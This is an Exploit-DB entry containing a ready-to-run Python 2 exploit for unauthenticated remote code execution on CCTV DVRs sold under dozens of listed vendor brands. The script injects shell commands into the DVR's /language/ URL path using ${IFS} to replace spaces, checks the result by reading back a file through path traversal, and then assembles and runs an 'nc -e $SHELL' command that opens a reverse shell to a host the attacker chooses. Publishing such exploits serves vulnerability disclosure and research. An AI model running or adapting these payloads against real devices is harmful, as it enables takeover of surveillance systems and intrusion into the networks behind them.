Multiple CCTV-DVR Vendors - Remote Code Execution

EDB-ID:

39596

CVE:

N/A

Author:

K1P0D

Type:

remote

Platform:

Hardware

Published:

2016-03-23

#!/usr/bin/python

# Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html

'''
Vendors List

Ademco
ATS Alarmes technolgy and ststems
Area1Protection
Avio
Black Hawk Security
Capture
China security systems
Cocktail Service
Cpsecured
CP PLUS
Digital Eye'z no website
Diote Service & Consulting
DVR Kapta
ELVOX 
ET Vision 
Extra Eye 4 U
eyemotion 
EDS 
Fujitron 
Full HD 1080p
Gazer 
Goldeye 
Goldmaster
Grizzly 
HD IViewer
Hi-View 
Ipcom
IPOX 
IR
ISC Illinois Security Cameras, Inc.
JFL Alarmes 
Lince 
LOT
Lux 
Lynx Security 
Magtec 
Meriva Security 
Multistar 
Navaio
NoVus 
Optivision 
PARA Vision
Provision-ISR 
Q-See 
Questek 
Retail Solution Inc
RIT Huston .com 
ROD Security cameras 
Satvision 
Sav Technology
Skilleye 
Smarteye 
Superior Electrial Systems
TechShell 
TechSon
Technomate 
TecVoz 
TeleEye 
Tomura
truVue
TVT 
Umbrella 
United Video Security System, Inc
Universal IT Solutions
US IT Express
U-Spy Store
Ventetian 
V-Gurad Security
Vid8 
Vtek
Vision Line
Visar
Vodotech.com 
Vook 
Watchman 
Xrplus 
Yansi 
Zetec
ZoomX
'''

from sys import argv
import optparse
from urlparse import urlparse
from re import compile
import socket
import requests
from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
from socket import timeout




def main():

    # parse command line options and atguments
    optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
    optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
                         help="Check if target is vulnerable")
    optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
                         help="Fire the exploit against the given target URL")

    (options, args) = optparser.parse_args()

    try:
        target = args[0]
    except IndexError:
        optparser.print_help()
        exit()

    target_url = urlparse(target)

    # validating hostname
    if not target_url.hostname:
        print "[X] supplied target \"%s\" is not a valid URL" % target
        optparser.print_help()
        exit()

    # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
    socket.setdefaulttimeout(10)

    # is -c flag on check if target url is vulnrable.
    if options.checkvuln is True:
        print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc
        try:

            # Write file
            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
                         % (target_url.scheme, target_url.netloc))

            # Read the file.
            response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))


            # remove it..
            raw_url_request('%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
                         % (target_url.scheme, target_url.netloc))

        except (ConnectionError, Timeout, timeout) as e:
            print "[X] Unable to connect. reason: %s.  exiting..." % e.message
            return
        if response.text[0] != '1': 
            print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
            return

        print "[V] Target \"%s\" is vulnerable!" % target_url.netloc



    # if -e is on then fire exploit,
    if options.connback is not None:

        # Validate connect-back information.
        pattern = compile('(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
        match = pattern.search(options.connback)
        if not match:
            print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback
            optparser.print_help()
            exit()

        # fire remote code execution!

        # Three ..
        try:
            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
                        % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))

        # Two ...

            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
                         % (target_url.scheme, target_url.netloc))


        # One. Left off!
            raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
                         % (target_url.scheme, target_url.netloc))

        except (ConnectionError, Timeout, timeout) as e:
            print "[X] Unable to connect reason: %s.  exiting..." % e.message



        print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \
              % (match.group('host'), match.group('port'))


# Disabling URL encode hack
def raw_url_request(url):
    r = requests.Request('GET')
    r.url = url
    r = r.prepare()
    # set url without encoding
    r.url = url

    s = requests.Session()
    return s.send(r)



if __name__ == '__main__':
    main()